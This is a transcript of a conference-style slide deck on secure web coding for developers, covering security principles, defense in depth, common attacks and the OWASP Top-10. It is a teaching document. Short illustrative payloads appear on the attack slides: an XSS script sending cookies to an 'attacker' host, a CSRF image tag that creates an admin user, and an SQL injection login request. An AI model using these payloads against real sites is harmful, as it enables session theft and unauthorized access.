secure web coding
TRANSCRIPT
![Page 1: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/1.jpg)
Secure Web CodingBecause Infosec peeps come from Mars and
developers come from Venus…
![Page 2: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/2.jpg)
$ whoami<profile> <real_name>Xavier Mertens</real_name> <day_job>Security Consultant</day_job> <night_job>Hacker, Blogger</night_job> <hobby>Your assets, Your data</hobby> <![CDATA[ www.truesec.be blog.rootshell.be;www.brucon.org; www.leakedin.com ]]></profile>
![Page 3: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/3.jpg)
Agenda• You said “security”?
• “Why targeting me? My $DATA are not relevant”
• Infosec Guys VS. Developers
• General principles
• Attacks
• The OWASP Top-10 project
![Page 4: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/4.jpg)
You said “security”?
![Page 5: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/5.jpg)
Goals
• To protect “data”
• To prevent unauthorized access
• To prevent unauthorized modification
• To prevent loss
![Page 6: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/6.jpg)
Information
Integrity
Availability
Confidentiality
![Page 7: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/7.jpg)
Security is relative
• Directly related to your business and needs (internal of external rules)
• Security is measured at a time “T”
• Security is directly related to the weakest point
• Security must be constantly reviewed and adapted
![Page 8: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/8.jpg)
– Bruce Schneier
“Security is a process, not a product.”
![Page 9: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/9.jpg)
“Why attacking me? My $DATA aren’t relevant”
![Page 10: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/10.jpg)
It’s all about $MONEY
• Security has a (huge) cost!
• The efforts must be proportional to the potential damage.
• A system can be considered “secure” if the effort of compromising it are higher than the gain of a breach.
![Page 11: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/11.jpg)
It’s a business!
if $attackerInvestiment < $stolenDataValue: try: exploit() except: find_another_victim()
but…
![Page 12: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/12.jpg)
Different motivations• Money
• Influence
• Fame
• Fun
• Pivot (often underestimated!)
![Page 13: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/13.jpg)
Pivot?“We are always a weakest point for someone else!”
You PartnerMe Trust
![Page 14: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/14.jpg)
Infosec Guys VS.
Developers
![Page 15: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/15.jpg)
“Developers think of ways to make things”
“Security Peeps think of ways to break things”
![Page 16: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/16.jpg)
Infosec Peeps VS. Devs
• Implement boring controls
• Make our daily job difficult
• Are paranoiac • Don’t know the
business
• Just write lines of code • Don’t have a clue
about security • Have short deadlines
(“RTM”) • Re-use pieces of code
(and their bugs)
![Page 17: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/17.jpg)
Business
Management / Compliance
Infosec Guys Developers
![Page 18: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/18.jpg)
General Principles
![Page 19: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/19.jpg)
Security
Features Ease of Use
![Page 20: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/20.jpg)
• Least privilege
• Minimize exposure
• Do not rely on “security by obscurity”
• Defense in depth
![Page 21: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/21.jpg)
Defense in depth“Defense in Depth (also known as Castle Approach) is an information assurance concept in which multiple layers of
security controls (defense) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a
vulnerability is exploited.”
(Source: Wikipedia)
![Page 22: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/22.jpg)
Multiple layers
Server
OS
Webserver
Database
Framework
Application
Firewall, Access-list, physical
HIDS, hardening
WAF
SQL proxy
Hardening
Developers
![Page 23: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/23.jpg)
“But we have a WAF?”
• A WAF provides a false sense of security
• Useful in the following scenarios:
• Legacy application
• 0-day vulnerability
![Page 24: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/24.jpg)
Input ResultsProcess
“Wrong inputs will generate wrong results!”
![Page 25: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/25.jpg)
(Common) Attacks
![Page 26: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/26.jpg)
Automated attacks
• Bots looking for recent (old ;-) vulnerabilities (ex: ShellSock)
• Scanners
• Script kiddies
![Page 27: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/27.jpg)
Targeted attacks
• Usually below the radar and manual
• With a specific goal
![Page 28: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/28.jpg)
XSS• Still remains a dangerous attack in 2014
• Reflective or stored
<script>new Image().src=“http://attacker/cookie.php?c=“+encodeURI(document.cookie);</script>
![Page 29: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/29.jpg)
CSRF• Users surf on multiple websites at the same time
(using tabs)
• Users use admin profiles (like on Windows computers)
<img src=“http://secretsite.com/newuser.php?login=root2&pass=foobar&profile=admin” width=“1” height=“1”
border=“0”>
![Page 30: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/30.jpg)
SQLi• Relevant data are stored in backend DB’s
POST /login.phpuser=admin&pass=foo’%20OR%2034>2;--
![Page 31: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/31.jpg)
Best Practice• Consider every access to the application as
malicious until proven as “safe”
• User input can’t be trusted
• Input data must be validated, encoded & escaped
• Don’t trust other developers (code sharing)
• Don’t trust $VENDORS!
![Page 32: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/32.jpg)
![Page 33: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/33.jpg)
The OWASP Top-10 Project
![Page 34: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/34.jpg)
“The OWASP Top-10 is a powerful awareness document for web application security. It represents a
broad consensus about what the most critical web application security flaws are.”
(Source: OWASP.org)
![Page 35: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/35.jpg)
Top Categories• Injection
• Broken authentication and session management
• Cross-Site Scripting (XSS)
• Insecure direct object references
• Security misconfiguration
• Sensitive data exposure
• Missing function level access control
• Cross-Site Request Forgery (CSRF)
• Using components with known vulnerabilities
• Unvalidated redirects and forwards
http://owasp.org/index.php/Top10
![Page 36: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/36.jpg)
Conclusions
![Page 37: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/37.jpg)
Think “SDLC”!“Software Development Life Cycle”
Requirements
Design
CodingTesting
Deployment
![Page 38: Secure Web Coding](https://reader030.vdocuments.mx/reader030/viewer/2022032616/55a69f291a28ab8b4c8b4580/html5/thumbnails/38.jpg)
“Thinking as a security guy can help developers to make things that are (more) difficult to break”
Thank You!